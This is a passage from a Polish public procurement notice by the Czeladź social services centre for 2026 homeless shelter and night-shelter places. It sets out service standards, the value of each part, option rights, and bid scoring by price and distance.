kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/>Schronisko powinno gwarantować: <br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 106580,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji w ramach części II do 365 osobodni.<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części) w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i dodatkowo wykonanie dodatkowej ilości usług będzie leżało w interesie zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>W celu uruchomienia prawa opcji zamawiający złoży wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>Prawo opcji jest jednostronnym uprawnieniem zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez zamawiającego z prawa opcji wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Jeżeli zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag (znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz CUS w Czeladzi-max 40%(O).Oferty zostaną ocen za pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60 pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby CUS w Czeladzi–(O).Ocena pkt w tym kryt zostanie dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu schroniska/noc do siedziby CUS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby CUS w Czeladzi“ liczonej w linii prostej w promieniu do 30 km od siedziby CUS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40 pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby CUS w Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby CUS w Czeladzi znajduje się dana placówka, Zamaw przyjmuje, że placów znajd się powyż 30km od siedziby CUS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do siedz CUS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zama w terminie pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp. Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty; wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ, czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część III:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych z usługami opiekuńczymi – dla 6 osób <br/>(kobiet lub mężczyzn) <br/><br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2025r. poz. 1214 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/>Schronisko powinno gwarantować: <br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 306600,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji w ramach części III do 365 osobodni<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części) w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i dodatkowo wykonanie dodatkowej ilości usług będzie leżało w interesie zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>W celu uruchomienia prawa opcji zamawiający złoży wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>Prawo opcji jest jednostronnym uprawnieniem zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez zamawiającego z prawa opcji wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Jeżeli zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag (znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz CUS w Czeladzi-max 40%(O).Oferty zostaną ocen za pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60 pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby CUS w Czeladzi–(O).Ocena pkt w tym kryt zostanie dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu schroniska/noc do siedziby CUS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby CUS w Czeladzi“ liczonej w linii prostej w promieniu do 30 km od siedziby CUS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40 pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby CUS w Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby CUS w Czeladzi znajduje się dana placówka, Zamaw przyjmuje, że placów znajd się powyż 30km od siedziby CUS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do siedz CUS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zama w terminie pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp. Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty; wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ, czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część IV:<br/>Udzielenie schronienia w noclegowni – dla kobiet lub mężczyzn – dla 2 osób (kobiet lub mężczyzn)<br/>Noclegownia powinna gwarantować: <br/>Noclegownia zapewnia schronienie osobom bezdomnym, świadcząc tymczasową pomoc w postaci miejsca noclegowego, w ramach której umożliwia spędzenie nocy w warunkach gwarantujących ochronę życia<br/>i zdrowia. <br/>Okres świadczenia usług: Noclegownia czynna jest cały rok, przez 7 dni w tygodniu, w godzinach:<br/>od 1 października do 31 marca od 1800 do 800<br/>od 1 kwietnia do 30 września od 1900 do 700<br/>Forma świadczonej usługi: Tymczasowe schronienie w postaci miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>Zakres usług: <br/>a) umożliwienie spożycia posiłku i zapewnienie gorącego napoju, <br/>b) umożliwienie skorzystania z prysznica oraz wymiany odzieży, <br/>c) zapewnienie dezynfekcji i dezynsekcji odzieży w przypadku braku możliwości jej wymiany, <br/>d) zapewnienie opieki przez co najmniej 1 opiekuna na nie więcej niż 50 osób przebywających w placówce.<br/>Pomieszczenia noclegowe: z co najmniej 1 otwieranym oknem na pomieszczenie lub wentylacją przewidzianą dla pomieszczeń mieszkalnych bez otwieranych okien. Pomieszczenia noclegowe ze swobodnym dostępem do łóżek. Miejsca do spania wyposażone w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc).<br/>Pomieszczenia sanitariatów: zapewniające stały dostęp do bieżącej ciepłej i zimnej wody oraz gwarantujące możliwość przeprowadzenia zabiegów higienicznych.<br/>Jadalnia/świetlica: Pomieszczenie do spożywania posiłków, które poza porami posiłków może pełnić funkcję świetlicy lub sali spotkań grupowych.<br/>Pomieszczenia biurowe: Wydzielone pomieszczenie do prac biurowych oraz indywidualnych rozmów<br/>z osobami bezdomnymi.<br/>Magazyn odzieży, bielizny, pościeli: Pomieszczenia wyposażone w regały, szafy i inne meble umożliwiające wymianę ubrań.<br/>Magazyn środków chemicznych: Wydzielone pomieszczenie na środki czystości i higieny.<br/>Pralnia: Wydzielone pomieszczenie wyposażone co najmniej w 1 pralkę dla 30 osób.<br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- prowadzenie rejestru osób prowadzonych w placówce<br/>- osoby przebywające w noclegowni pobyt swój potwierdzać będą każdorazowo, w godzinach wieczornych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach<br/>- w okresie grzewczym zapewnienie odpowiedniej temperatury pomieszczeń<br/>- prowadzenie pracy socjalnej w tym: motywowanie osób bezdomnych do podjęcia terapii odwykowej, pomocy w załatwieniu spraw urzędowych i osobistych, podjęcia aktywności zawodowej, wzmocnienia aktywności i samodzielności osób bezdomnych.<br/>Placówka musi spełniać wymagania określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r. (Dz.U. z 2018 r. poz. 896). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39038,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji w ramach części IV do 365 osobodni<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części) w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i dodatkowo wykonanie dodatkowej ilości usług będzie leżało w interesie zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>W celu uruchomienia prawa opcji zamawiający złoży wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>Prawo opcji jest jednostronnym uprawnieniem zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez zamawiającego z prawa opcji wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Jeżeli zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag (znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz CUS w Czeladzi-max 40%(O).Oferty zostaną ocen za pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60 pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby CUS w Czeladzi–(O).Ocena pkt w tym kryt zostanie dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu 